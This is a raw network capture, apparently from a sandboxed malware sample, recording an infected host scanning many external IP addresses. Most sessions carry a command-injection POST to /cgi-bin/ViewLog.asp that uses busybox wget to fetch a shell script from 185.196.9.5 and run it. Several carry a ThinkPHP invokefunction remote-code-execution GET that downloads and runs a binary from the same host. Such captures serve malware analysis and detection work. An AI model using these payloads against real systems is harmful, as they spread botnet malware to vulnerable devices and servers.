Feb 25, 2024 19:05:03.809616089 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:07.045047045 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.188935995 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:25.220757961 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1046	192.168.2.15	44502	95.214.144.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:03.809662104 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1047	192.168.2.15	42836	94.123.159.112	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:03.842643023 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1048	192.168.2.15	49766	95.86.120.187	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:03.849894047 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1049	192.168.2.15	33914	31.172.75.37	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:04.180766106 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:04.357800007 CET	451	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:04 GMT Server: Apache/2.4.53 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1f Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1050	192.168.2.15	41846	94.121.118.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:04.286101103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1051	192.168.2.15	34218	94.123.90.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:04.293857098 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1052	192.168.2.15	40674	88.119.214.91	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:04.706557035 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:04.906879902 CET	242	IN	HTTP/1.0 400 Bad Request Connection: close Content-Length: 113 Date: Sun, 25 Feb 2024 18:05:04 GMT Expires: 0 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1053	192.168.2.15	58686	95.128.46.113	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:04.875858068 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:05.044872999 CET	507	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 17:51:26 GMT Server: Apache/2.4.38 (Debian) Content-Length: 313 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 61 74 72 69 6d 6f 69 6e 65 2e 63 6c 61 6d 61 72 74 2e 66 72 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at patrimoine.clamart.fr Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1054	192.168.2.15	50008	95.216.152.7	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:04.902987003 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:05.098484039 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:04 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1055	192.168.2.15	41936	95.181.133.158	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:05.122023106 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:05.369244099 CET	163	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1056	192.168.2.15	38124	31.136.134.200	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:05.210123062 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:05.764955997 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:06.852960110 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:09.092993021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.444888115 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:22.148816109 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:39.812653065 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1057	192.168.2.15	50198	31.136.125.189	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:05.211777925 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:05.764976025 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:06.884932995 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:09.093082905 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.701015949 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:22.660959005 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:41.860508919 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1058	192.168.2.15	40322	31.136.166.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:05.212424994 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:05.764977932 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
